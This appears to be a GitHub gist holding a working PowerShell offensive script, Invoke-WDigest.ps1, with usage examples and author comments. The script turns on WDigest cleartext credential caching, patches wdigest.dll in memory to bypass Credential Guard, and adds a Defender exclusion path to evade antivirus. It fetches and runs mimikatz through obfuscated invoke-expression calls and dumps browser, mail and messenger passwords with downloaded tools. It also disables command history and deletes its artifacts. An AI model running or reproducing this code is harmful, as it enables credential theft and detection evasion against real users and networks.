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Last active July 25, 2024 04:46
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WDigest credential caching [Memory]
WDigest credential caching [Memory]
Author: @r00t-3xp10it
Credits: @wh0nsq [BypassCredGuard.exe]
Credits: @BenjaminDelpy [mi`mi`katz.exe]
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: Administrator privileges
Optional Dependencies: WDigest, BypassCredGuard.exe
PS cmdlet Dev version: v3.5.19
WDigest stores clear-text passwords in memory. An adversary can use a tool like
M[i]mika[t]z to get not just the hashes stored in memory, but the clear-text creds
as well. As a result, they will not be limited to attacks like Pass-the-Hash, they
also be able to log on to Exchange, internal web sites, and other resources that
require entering a user ID and password.
This module allow users to dump WDigest creds with M[i]mika[t]z without reboot or to
spawn\execute M[i]mika[t]z trougth Windows defender ExclusionPath to bypass detection.
To use M[i]mika[t]z interactive shell invoke -manycats switch together with -module 'false' paramter
To use M[i]mika[t]z multiple::modules invoke -manycats with -module 'sekurlsa::wdigest event::clear'
REMARK: This cmdlet only bypasses M[i]mika[t]z detection if Windows Defender its the only AV running.
-runas and -dcname are demonstration parameter switch's that promps user for credential
input so that WDigest can store it in memory and M[i]mika[t]z can dump it later [demo].
.Parameter WDigest
Activate WDigest credential caching in Memory? (default: true)
.Parameter Manycats
Switch that downloads\executes M[i]mika[t]z to dump credentials
.Parameter BrowserCreds
Switch that dumps installed browers credentials in clear-text
.Parameter RunAs
Switch that promps user for credential input and store it in memory
.Parameter DcName
Switch of RunAs command that accepts USER@DOMAIN or DOMAIN\USER form
Remark: this function requires -RunAs parameter switch declaration
.Parameter Module
M[i]mika[t]z selection of modules to run (default: sekurlsa::wdigest)
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'false' -manycats
Execute M[i]mika[t]z (interactive shell) without WDigest caching
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'true' -manycats
Ativate WDigest caching + Execute M[i]mika[t]z sekurlsa::wdigest
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'true' -manycats -module 'auto'
Ativate WDigest caching + Exec M[i]mika[t]z pre-sellection of modules
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'false' -browsercreds
Dump browser creds (nirsoft) without invoking WDigest caching
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'true' -manycats -module 'net::group sekurlsa::wdigest exit'
Ativate WDigest caching + Exec M[i]mika[t]z 'net::group sekurlsa::wdigest exit' multiple modules
PS C:\> .\Invoke-WDigest.ps1 -wdigest 'true' -manycats -runas
[demo] This command allow us to invoke RunAs api [manual enter credential]
and then use M[i]mika[t]z to dump WDigest recent stored credential [memory]
None. You cannot pipe objects into Invoke-WDigest.ps1
WDigest credential caching (Memory)
- Privileges token: Administrator
- DcUserName SKYNET\Administrator
- Create defender %TMP% exclusion
- Patching Wdigest.dll in Memory
[*] Base address of wdigest.dll: 0x00007ffd4a670000
[*] Matched signature at 0x00007ffd4a671c4b: 41 b5 01 85 c0
[*] Address of g_fParameter_UseLogonCredential: 0x00007ffd4a6aa2e4
[*] Address of g_IsCredGuardEnabled: 0x00007ffd4a6a9ca8
[*] The current value of g_fParameter_UseLogonCredential is 0
[*] Patched value of g_fParameter_UseLogonCredential to 1
[*] The current value of g_IsCredGuardEnabled is 0
[*] Patched value of g_IsCredGuardEnabled to 0
- Downloading mi`mikat`z from github to %TMP%
- Invoking mi`mikat`z sekurlsa::wdigest to dump creds.
.#####. mimi`kat`z 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( )
## \ / ## >`kat`z
'## v ##' Vincent LE TOUX ( )
'#####' > / ***/
[CmdletBinding(PositionalBinding=$false)] param(
$StartBanner = @"
##:'##: ##: ##.... ##:. ##::'##... ##:: ##.....::'##... ##:... ##..::
##: ##: ##: ##:::: ##:: ##:: ##:::..::: ##::::::: ##:::..::::: ##::::
##: ##: ##: ##:::: ##:: ##:: ##::'####: ######:::. ######::::: ##::::
##: ##: ##: ##:::: ##:: ##:: ##::: ##:: ##...:::::..... ##:::: ##::::
##: ##: ##: ##:::: ##:: ##:: ##::: ##:: ##:::::::'##::: ##:::: ##::::
. ###. ###:: ########::'####:. ######::: ########:. ######::::: ##::::
If($Banner -iMatch "^(true)$")
write-host $StartBanner -ForegroundColor DarkRed
Start-Sleep -Milliseconds 500
$CmdletVersion = "v3.5.19"
## Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
If(-not($DebugMe.IsPresent)){$ErrorActionPreference = "SilentlyContinue"}
write-host "`nWDigest credential caching (Memory)" -ForegroundColor Green
$host.UI.RawUI.WindowTitle = "@DeviceGuard $CmdletVersion {SSA@RedTeam}"
$Ipath = (Get-Location).Path
## Make sure shell is running with administrator privileges
$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match "S-1-5-32-544")
If($IsClientAdmin -iNotMatch '^(True)$')
write-host " - " -ForegroundColor Red -NoNewline
write-host "Error: " -ForegroundColor DarkGray -NoNewline
write-host "Administrator privileges required ..`n" -ForegroundColor Red
$Testme = @()
$EDRvendors = @(
"Trend Micro",
cd "$Env:TMP"
## Print OnScreen module information
write-host " - " -ForegroundColor Red -NoNewline
write-host "Privileges token: " -NoNewline
write-host "Administrator" -ForegroundColor Red
Start-Sleep -Milliseconds 600
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "DcUserName $DcName"
$Obfuscation = "mi`mi" + "kat`z" -join ''
## Enumerate all Anti-Virus Processes running [proactive defense]
dir "$Env:TMP"|Where-Object{$_.Name -Match '(_CounterMeasures.log)$'}|Remove-Item -Force
iwr -Uri "" -OutFile "$Env:TMP\GetCounterMeasures.ps1"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList "-file $Env:TMP\GetCounterMeasures.ps1 -logfile true" -Wait
$AVNAME = (Gci -Path "$Env:TMP"|Where-Object{$_ -Match '_CounterMeasures.log'}).FullName
ForEach($Item in $EDRvendors)
If(Get-Content -path "$AVNAME"|Select-String -pattern "$Item")
write-host "`n [" -ForegroundColor Red -NoNewline
write-host "$Item" -NoNewline
write-host "] Disable proactive defense to run modules.`n" -ForegroundColor Red
Start-Sleep -Milliseconds 700
## CleanUP
Remove-Item -Path "$AVNAME" -Force
Remove-Item -Path "$Env:TMP\GetCounterMeasures.ps1" -Force
## Create TMP% directory exclusion in windows Defender
If((Get-MpComputerStatus).RealTimeProtectionEnabled -Match '^(True)$')
## Make sure the exclusion does NOT already exist
If((Get-MpPreference).ExclusionPath -NotMatch '(\\Temp)$')
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "Create defender %TMP% exclusion"
iwr -uri "" -OutFile "$Env:TMP\Invoke-Exclusions.ps1";
Start-Process -WindowStyle Hidden powershell -ArgumentList "-file Invoke-Exclusions.ps1 -Action add -Type ExclusionPath -Exclude $Env:TMP" -Wait
If($Wdigest -Match '^(true)$')
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "Patching Wdigest.dll in Memory`n"
## Download (from my github) and Execute the binary.exe
iwr -uri "" -OutFile "BypassCredGuard.exe"|Unblock-File
}Catch{write-host $_.Exception.Message -ForegroundColor Red;return}
Remove-Item -Path "$Env:TMP\BypassCredGuard.exe" -Force
write-host ""
Author: @r00t-3xp10it
Helper - Execute RunAs Command!
This module pauses this cmdlet execution until one credential its inputed,
then starts cmd.exe with suplied cred in a hidden windows (detach from parent).
Child process its necessary for 'sekur[l]sa::w[d]igest' to dump cred from memory.
## Use 'default' DC name in case var its empty
If($Wdigest -Match '^(true)$')
write-host " [" -ForegroundColor Red -NoNewline
write-host "Input" -NoNewline
write-host "] credential of username: $DcName`n" -ForegroundColor Red
## Prompt user for credential
Start-Process -WindowStyle hidden cmd.exe -Credential ''|Out-Null
If($? -Match '^(False)$')
write-host " - fail to execute cmd.exe process.`n" -ForegroundColor Red
write-host " [" -ForegroundColor Red -NoNewline
write-host "Error" -NoNewline
write-host "] -runas switch requires param -wdigest 'true'" -ForegroundColor Red
write-host " Because child process started (runas) hangs $Obfuscation" -ForegroundColor DarkYellow
write-host " execution if $Obfuscation its executed in interactive mode.`n" -ForegroundColor DarkYellow
## Determining if system is 32 or 64 bit
$GitHubParrotUri = "${Obfuscation}/master/Win32/${Obfuscation}.exe"
$GitHubParrotUri = "${Obfuscation}/master/x64/${Obfuscation}.exe"
## Download binary.exe from ParrotSec GitHub
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "Downloading ${Obfuscation}.exe from github to %TMP%"
iwr -uri "$GitHubParrotUri" -OutFile "${Env:TMP}\manycats.msc"|Unblock-File
## m[i]mika[t]z execution
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "Invoking " -NoNewline
write-host "${Obfuscation}" -ForegroundColor DarkYellow -NoNewline
If($Wdigest -Match '^(true)$')
Author: @r00t-3xp10it
Helper - M[i]mika[t]z - With WDigest catching
.Parameter module
Accepts values 'false', 'auto' Or
m[i]mika[t]z multiple 'dump::modules'
If($Module -Match '^(false)$')
$Sting = "sek%url@sa:@:lo@go%npa@ss%wo@rds"
$AutomaticExecution = $Sting -replace '%','' -replace '@',''
write-host " $AutomaticExecution `n" -ForegroundColor DarkYellow
&('xEx' -replace '^(x)','i') ".\manycats.msc $AutomaticExecution exit"
ElseIf($Module -iMatch '^(auto)$')
## Running pre-sellection of modules
$Sting = "ne%t:@:gro@up t@s:%:ses@sio%ns dp@ap%i:%:ca@ch%e vau%lt:@:cr%ed sek%url@sa:@:wd@ig%est ex@it"
$AutomaticExecution = $Sting -replace '%','' -replace '@',''
write-host " pre-selected modules [auto]`n"
&('xEx' -replace '^(x)','i') ".\manycats.msc $AutomaticExecution"
write-host " multiple modules.`n"
&('xEx' -replace '^(x)','i') ".\manycats.msc $Module"
Author: @r00t-3xp10it
Helper - M[i]mika[t]z - Without WDigest catching
.Parameter module
Accepts values 'false' (interactive shell),
'auto' Or m[i]mika[t]z multiple 'dump::modules'
If($Module -Match '^(false)$')
write-host " interactive shell`n"
&('xEx' -replace '^(x)','i') ".\manycats.msc"
ElseIf($Module -iMatch '^(auto)$')
## Running pre-sellection of modules
$Sting = "ne%t:@:gro@up t@s:%:ses@sio%ns dp@ap%i:%:ca@ch%e vau%lt:@:cr%ed sek%url@sa:@:wd@ig%est ex@it"
$AutomaticExecution = $Sting -replace '%','' -replace '@',''
write-host " pre-selected modules [auto]`n"
&('xEx' -replace '^(x)','i') ".\manycats.msc $AutomaticExecution"
write-host " multiple modules.`n"
&('xEx' -replace '^(x)','i') ".\manycats.msc $Module"
write-host ""
## Auto-CleanUp of artifacts left behind
Remove-Item -Path "${Env:TMP}\manycats.msc" -Force
Author: @r00t-3xp10it
Helper - Dump browser\outlook credentials
## Download binary.exe from redpill\utils [GitHub]
write-host "`n - " -ForegroundColor Yellow -NoNewline
write-host "Downloading WebBrowserPass to %TMP%"
## WebBrowserPassView execution
write-host " - " -ForegroundColor Yellow -NoNewline
write-host "Invoking " -NoNewline
write-host "WebBrowser" -ForegroundColor DarkYellow -NoNewline
write-host " Credential dump`n"
## Dump all browsers credentials
$CmdLine = "/LoadPasswordsIE 1 /LoadPasswordsFirefox 1 /LoadPasswordsChrome 1 /LoadPasswordsOpera 1 /LoadPasswordsSafari 1"
iwr -uri "" -OutFile "$Env:TMP\NavigatorView.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\NavigatorView.msc $CmdLine /stext webbrowser.txt" -Wait
Get-Content -Path "$Env:TMP\webbrowser.txt"
## Dump mail services credentials
iwr -uri "" -OutFile "$Env:TMP\mailpv.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\mailpv.msc /stext maildump.txt" -Wait
Get-Content -Path "$Env:TMP\maildump.txt"
## Dump Instant Messenger credentials
iwr -uri "" -OutFile "$Env:TMP\mspass.msc"|Unblock-File
Start-Process -WindowStyle Hidden powershell -ArgumentList ".\mspass.msc /stext mspass.txt" -Wait
Get-Content -Path "$Env:TMP\mspass.txt"
## CleanUp
Start-Sleep -Milliseconds 600
Remove-Item -Path "${Env:TMP}\mspass.cfg" -Force
Remove-Item -Path "${Env:TMP}\mspass.txt" -Force
Remove-Item -Path "${Env:TMP}\mspass.msc" -Force
Remove-Item -Path "${Env:TMP}\mailpv.cfg" -Force
Remove-Item -Path "${Env:TMP}\mailpv.msc" -Force
Remove-Item -Path "${Env:TMP}\maildump.txt" -Force
Remove-Item -Path "${Env:TMP}\webbrowser.txt" -Force
Remove-Item -Path "${Env:TMP}\NavigatorView.msc" -Force
Remove-Item -Path "${Env:TMP}\WebBrowserPassView.cfg" -Force
## Windows Defender Exclusion CleanUp
If((Get-MpComputerStatus).RealTimeProtectionEnabled -Match '^(True)$')
## Make sure the exclusion exists
If((Get-MpPreference).ExclusionPath -Match '(\\Temp)$')
write-host "`n - " -ForegroundColor Red -NoNewline
write-host "Removing '" -NoNewline
write-host "%TMP%" -ForegroundColor Red -NoNewline
write-host "' exclusion from windows defender."
Start-Process -WindowStyle Hidden powershell -ArgumentList "-file Invoke-Exclusions.ps1 -Action del -Type ExclusionPath -Exclude $Env:TMP" -Wait;
Remove-Item -Path "$Env:TMP\Invoke-Exclusions.ps1" -Force
cd "$Ipath"
## Stop runas background process
Stop-Process -Name "cmd" -Force
write-host " - " -ForegroundColor Green -NoNewline
write-host "Module finished at: " -NoNewline
write-host "$(Get-Date -Format 'HH:mm:ss')" -ForegroundColor Green -NoNewline
write-host " UTC`n"
Copy link

r00t-3xp10it commented Feb 13, 2023



## Ativate WDigest caching + dump credentials
.\Invoke-WDigest.ps1 -WDigest 'true' -runas -mimi

   - Invoke-WDigest.ps1 Ativates WDigest caching in memory
   - Invoke-WDigest.ps1 prompts user to enter credential to start cmd
   - WDigest will store credential input by user in clear-text in memory
   - mimikatz will auto-execute 'sekurlsa::wdigest exit' to dump creds

   RunAs parameter switch exists for demonstration effects, and can not
   be used remotely because it requires target user interaction (prompt cred)
   and DC UserName password knowledge ..

Activate WDigest memory catching + invoke mimikatz multiple dump::modules automatic

.\Invoke-WDigest.ps1 -wdigest 'true' -mimi -agressive

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r00t-3xp10it commented Feb 13, 2023

&('xEx' -replace '^(x)','i') ".\${Obfuscation}.exe sekurlsa::wdigest exit"

Copy link

r00t-3xp10it commented Mar 1, 2023

This is a note

This is a warning


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